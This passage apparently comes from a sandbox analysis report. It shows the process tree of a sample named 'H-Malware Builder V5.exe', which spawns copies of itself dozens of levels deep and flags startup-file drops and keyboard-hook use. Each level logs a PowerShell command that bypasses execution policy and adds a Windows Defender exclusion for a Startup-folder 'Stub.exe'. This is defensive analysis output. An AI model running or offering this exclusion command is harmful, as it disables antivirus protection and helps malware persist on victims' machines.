                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:708
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                  20⤵
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  • Drops startup file
                                                                                                                                                  PID:4596
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                    21⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    PID:1004
                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      22⤵
                                                                                                                                                        PID:2000
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                      21⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Drops startup file
                                                                                                                                                      PID:2648
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                        22⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:1928
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          23⤵
                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                          PID:1232
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                        22⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Drops startup file
                                                                                                                                                        PID:2456
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                          23⤵
                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                          PID:5084
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            24⤵
                                                                                                                                                              PID:4904
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                            23⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Drops startup file
                                                                                                                                                            PID:544
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                              24⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:4556
                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                25⤵
                                                                                                                                                                  PID:1492
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                24⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Drops startup file
                                                                                                                                                                PID:3852
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                  25⤵
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  PID:640
                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    26⤵
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:1952
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                  25⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Drops startup file
                                                                                                                                                                  PID:2044
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                    26⤵
                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                    PID:4468
                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      27⤵
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:3784
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                    26⤵
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    • Drops startup file
                                                                                                                                                                    PID:1956
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                      27⤵
                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                      PID:1648
                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        28⤵
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:748
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                      27⤵
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      • Drops startup file
                                                                                                                                                                      PID:3100
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                        28⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        PID:3740
                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          29⤵
                                                                                                                                                                            PID:3244
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                          28⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          • Drops startup file
                                                                                                                                                                          PID:936
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                            29⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:3832
                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              30⤵
                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                              PID:1996
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                            29⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Drops startup file
                                                                                                                                                                            PID:3044
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                              30⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              PID:3296
                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                31⤵
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:1852
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                              30⤵
                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                              • Drops startup file
                                                                                                                                                                              PID:2432
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                31⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:932
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  32⤵
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:232
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                31⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                PID:1620
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                  32⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:4740
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    33⤵
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:4808
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                  32⤵
                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                  • Drops startup file
                                                                                                                                                                                  PID:4408
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                    33⤵
                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                    PID:1612
                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      34⤵
                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                      PID:1004
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                    33⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    • Drops startup file
                                                                                                                                                                                    PID:2708
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                      34⤵
                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                      PID:3732
                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        35⤵
                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                        PID:3084
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                      34⤵
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      • Drops startup file
                                                                                                                                                                                      PID:5084
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                        35⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        PID:1732
                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          36⤵
                                                                                                                                                                                            PID:2568
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                          35⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                          PID:2316
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                            36⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            PID:2008
                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              37⤵
                                                                                                                                                                                                PID:3392
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                              36⤵
                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                              • Drops startup file
                                                                                                                                                                                              PID:3616
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                37⤵
                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                PID:3216
                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  38⤵
                                                                                                                                                                                                    PID:1952
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                  37⤵
                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                  • Drops startup file
                                                                                                                                                                                                  PID:4320
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                    38⤵
                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                    PID:4832
                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      39⤵
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:4360
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                    38⤵
                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                    • Drops startup file
                                                                                                                                                                                                    PID:4468
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                      39⤵
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      PID:1384
                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        40⤵
                                                                                                                                                                                                          PID:4452
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                        39⤵
                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                        PID:1964
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                          40⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:4696
                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            41⤵
                                                                                                                                                                                                              PID:3800
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                            40⤵
                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                                            PID:228
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                              41⤵
                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                              PID:4368
                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                42⤵
                                                                                                                                                                                                                  PID:5040
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                                41⤵
                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                PID:1484
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                                  42⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  PID:4360
                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    43⤵
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:4432
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                                  42⤵
                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                  • Drops startup file
                                                                                                                                                                                                                  PID:2380
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                                    43⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    PID:1384
                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      44⤵
                                                                                                                                                                                                                        PID:2532
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                                      43⤵
                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                      • Drops startup file
                                                                                                                                                                                                                      PID:1880
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                                        44⤵
                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                        PID:816
                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          45⤵
                                                                                                                                                                                                                            PID:2132
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                                          44⤵
                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                                                          PID:1516
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                                            45⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            PID:4916
                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              46⤵
                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                              PID:2936
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                                            45⤵
                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                                                            PID:2584
                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                                              46⤵
                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                              PID:4484
                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                47⤵
                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                PID:1728
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                                              46⤵
                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                              • Drops startup file
                                                                                                                                                                                                                              PID:5012
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
                                                                                                                                                                                                                                47⤵
                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                PID:3084
                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  48⤵
                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                  PID:4644
                                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 3084 -s 404
                                                                                                                                                                                                                                  48⤵
                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                  PID:2788
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
                                                                                                                                                                                                                                47⤵
                                                                                                                                                                                                                                • Checks computer location settings
